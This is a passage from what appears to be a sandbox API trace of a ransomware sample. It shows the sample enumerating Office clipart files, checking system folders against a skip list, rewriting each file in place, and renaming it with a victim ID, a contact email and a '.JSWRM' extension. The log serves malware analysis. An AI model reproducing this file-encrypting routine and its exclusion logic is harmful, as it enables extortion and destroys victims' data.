returned 1 [0080.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0080.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0080.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0080.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0080.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0080.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0080.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.490] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101867.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101867.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0080.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0080.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0080.491] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ee8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101980.WMF", cAlternateFileName="")) returned 1 [0080.491] lstrcmpiW (lpString1="J0101980.WMF", lpString2=".") returned 1 [0080.491] lstrcmpiW (lpString1="J0101980.WMF", lpString2="..") returned 1 [0080.491] lstrcmpiW (lpString1="J0101980.WMF", lpString2="...") returned 1 [0080.491] lstrcmpiW (lpString1="J0101980.WMF", lpString2="windows") returned -1 [0080.491] lstrcmpiW (lpString1="J0101980.WMF", lpString2="recovery") returned -1 [0080.491] lstrcmpiW (lpString1="J0101980.WMF", lpString2="perflogs") returned -1 [0080.491] lstrcmpiW (lpString1="J0101980.WMF", lpString2="documents and settings") returned 1 [0080.491] lstrcmpiW (lpString1="J0101980.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.491] lstrcmpiW (lpString1="J0101980.WMF", lpString2="system volume information") returned -1 [0080.491] lstrcmpiW (lpString1="J0101980.WMF", lpString2="msocache") returned -1 [0080.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101980.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101980.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101980.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0080.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101980.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101980.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101980.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0080.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0080.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0080.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0080.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101980.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.492] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16104) returned 1 [0080.492] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ee0) returned 0x24d210 [0080.493] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3ee0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3ee0, lpOverlapped=0x0) returned 1 [0080.495] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.495] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3ee0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3ee0, lpOverlapped=0x0) returned 1 [0080.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.496] CloseHandle (hObject=0x314) returned 1 [0080.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0080.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0080.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0080.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0080.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0080.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0080.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0080.496] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101980.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101980.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0080.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0080.497] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3e74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0102002.WMF", cAlternateFileName="")) returned 1 [0080.497] lstrcmpiW (lpString1="J0102002.WMF", lpString2=".") returned 1 [0080.497] lstrcmpiW (lpString1="J0102002.WMF", lpString2="..") returned 1 [0080.497] lstrcmpiW (lpString1="J0102002.WMF", lpString2="...") returned 1 [0080.497] lstrcmpiW (lpString1="J0102002.WMF", lpString2="windows") returned -1 [0080.497] lstrcmpiW (lpString1="J0102002.WMF", lpString2="recovery") returned -1 [0080.497] lstrcmpiW (lpString1="J0102002.WMF", lpString2="perflogs") returned -1 [0080.497] lstrcmpiW (lpString1="J0102002.WMF", lpString2="documents and settings") returned 1 [0080.497] lstrcmpiW (lpString1="J0102002.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.497] lstrcmpiW (lpString1="J0102002.WMF", lpString2="system volume information") returned -1 [0080.497] lstrcmpiW (lpString1="J0102002.WMF", lpString2="msocache") returned -1 [0080.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0080.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102002.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102002.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0102002.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0080.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0080.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102002.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102002.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0102002.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0080.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0080.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0080.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0080.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102002.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.498] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15988) returned 1 [0080.498] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3e70) returned 0x24d210 [0080.498] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3e70, lpOverlapped=0x0) returned 1 [0080.501] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.501] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3e70, lpOverlapped=0x0) returned 1 [0080.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.501] CloseHandle (hObject=0x314) returned 1 [0080.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0080.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0080.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0080.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0080.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0080.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0080.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0080.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0080.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.502] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102002.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102002.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0080.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0080.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0080.502] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5dee50, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe5dee50, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6978, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0102594.WMF", cAlternateFileName="")) returned 1 [0080.502] lstrcmpiW (lpString1="J0102594.WMF", lpString2=".") returned 1 [0080.502] lstrcmpiW (lpString1="J0102594.WMF", lpString2="..") returned 1 [0080.502] lstrcmpiW (lpString1="J0102594.WMF", lpString2="...") returned 1 [0080.502] lstrcmpiW (lpString1="J0102594.WMF", lpString2="windows") returned -1 [0080.502] lstrcmpiW (lpString1="J0102594.WMF", lpString2="recovery") returned -1 [0080.502] lstrcmpiW (lpString1="J0102594.WMF", lpString2="perflogs") returned -1 [0080.502] lstrcmpiW (lpString1="J0102594.WMF", lpString2="documents and settings") returned 1 [0080.502] lstrcmpiW (lpString1="J0102594.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.502] lstrcmpiW (lpString1="J0102594.WMF", lpString2="system volume information") returned -1 [0080.502] lstrcmpiW (lpString1="J0102594.WMF", lpString2="msocache") returned -1 [0080.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0080.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102594.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102594.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0102594.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0080.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102594.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102594.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0102594.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0080.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0080.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0080.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102594.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.503] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27000) returned 1 [0080.503] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6970) returned 0x24d210 [0080.503] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6970, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6970, lpOverlapped=0x0) returned 1 [0080.507] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.507] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6970, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6970, lpOverlapped=0x0) returned 1 [0080.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.507] CloseHandle (hObject=0x314) returned 1 [0080.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0080.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0080.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0080.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0080.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0080.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0080.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0080.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102594.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 